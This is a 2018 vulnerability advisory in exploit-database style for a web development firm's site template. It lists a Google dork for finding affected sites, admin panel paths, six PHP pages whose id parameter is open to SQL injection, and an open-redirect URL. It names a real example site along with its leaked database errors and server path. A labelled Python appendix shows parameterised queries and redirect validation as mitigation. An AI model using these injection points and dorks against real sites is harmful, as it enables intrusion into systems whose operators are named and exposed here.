#################################################################################################
# Exploit Title : Web Development Invasor Diagonal SQL Injection and Open Redirection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/09/2018
# Vendor Homepage : invasordiagonal.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#       + CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
#################################################################################################
# Google Dork :
intext:"web development // invasor diagonal"
# Admin Control Panel Login Path =>
/site_DOMAINNAMEADDRESSHERE_UAT/admin/
/admin/
# SQL Injection Exploits :
/eventos.php?id=[SQL Injection]
/tenistas.php?id=[SQL Injection]
/profesionales_header.php?id=[SQL Injection]
/novedades.php?id=[SQL Injection]
/eventosCorporativos.php?id=[SQL Injection]
/marcas.php?id=[SQL Injection]
# Open Redirection Exploit =>
TARGET/site_DOMAINNAMEADDRESSHERE_UAT/set_language.php?idioma=2&gourl=https://www.REDIRECTIONADDRESSHERE.gov
#################################################################################################
# Example Vulnerable Site => exxiasports.com/eventos.php?id=2%27 => [ Proof of Concept ] => archive.is/b9eAH
# Example Admin Panel Path => exxiasports.com/site_exxia_UAT/admin/ => [ Proof of Concept ] => archive.is/fO8Pi
# Example Open Redirection Vuln Proof of Concept =>
exxiasports.com/site_exxia_UAT/set_language.php?idioma=2&gourl=https://cxsecurity.com => archive.is/7Ay4h
# SQL Database Error =>
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near 'AND Objeto = 'Eventos' AND Destacado = 1 LIMIT 1' at line 1]
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near 'AND Objeto = 'Eventos' AND Extension = 'jpg' AND Destacado = 0
ORDER BY OrdenIma' at line 1]
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near 'AND Objeto = 'Eventos' ORDER BY Orden' at line 1]
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near 'AND Objeto = 'Eventos' AND Extension != 'jpg'
ORDER BY OrdenImagen' at line 1]
Warning: Invalid argument supplied for foreach() in /nfs/c05/h01/mnt/72313/domains/exxiasports.com/html/novedades.php on line 43
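Added mitigation example, not part of this advisory or the vendor's code: a Python stand-in showing how the two affected parameters, eventos.php?id= and set_language.php?gourl=, can be validated so that a quote in id never reaches the database and an off-site gourl never produces a redirect. The table name Imagenes, the Archivo column and the sample rows are constructed; the other column names are taken from the error messages above.

```python
import re
import sqlite3
from urllib.parse import urlsplit

def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the site's database (table name,
    Archivo column and rows are assumptions; other columns come from the errors)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Imagenes (id INTEGER, Objeto TEXT, Extension TEXT,"
                 " Destacado INTEGER, OrdenImagen INTEGER, Archivo TEXT)")
    conn.executemany("INSERT INTO Imagenes VALUES (?,?,?,?,?,?)", [
        (2, "Eventos", "jpg", 1, 1, "evento2.jpg"),
        (3, "Eventos", "jpg", 1, 1, "evento3.jpg"),
    ])
    return conn

def fetch_evento_image(conn: sqlite3.Connection, raw_id: str):
    """Hardened lookup for eventos.php?id=: accept only a plain decimal integer,
    then bind it as a parameter instead of concatenating it into the query."""
    if not re.fullmatch(r"[0-9]+", raw_id or ""):
        raise ValueError("id must be a positive integer")   # "2'" is refused here
    row = conn.execute(
        "SELECT Archivo FROM Imagenes WHERE id = ? AND Objeto = 'Eventos' "
        "AND Destacado = 1 LIMIT 1", (int(raw_id),)).fetchone()
    return row[0] if row else None

def safe_redirect_target(gourl: str, own_host: str, default: str = "/") -> str:
    """Hardened handling of set_language.php?gourl=: only same-site targets are
    honoured; anything else falls back to the default page."""
    if not gourl:
        return default
    # browsers treat backslashes like slashes, so "\\evil" must look like "//evil"
    parts = urlsplit(gourl.replace("\\", "/"))
    if parts.scheme or parts.netloc:
        # absolute URL: allow only our own host over https (also rejects
        # user@host tricks, since netloc then contains the "@" part)
        if parts.scheme != "https" or parts.netloc.lower() != own_host.lower():
            return default
        return gourl
    # relative target: must be an absolute path, not protocol-relative ("//host")
    if not parts.path.startswith("/") or parts.path.startswith("//"):
        return default
    return gourl
```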
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################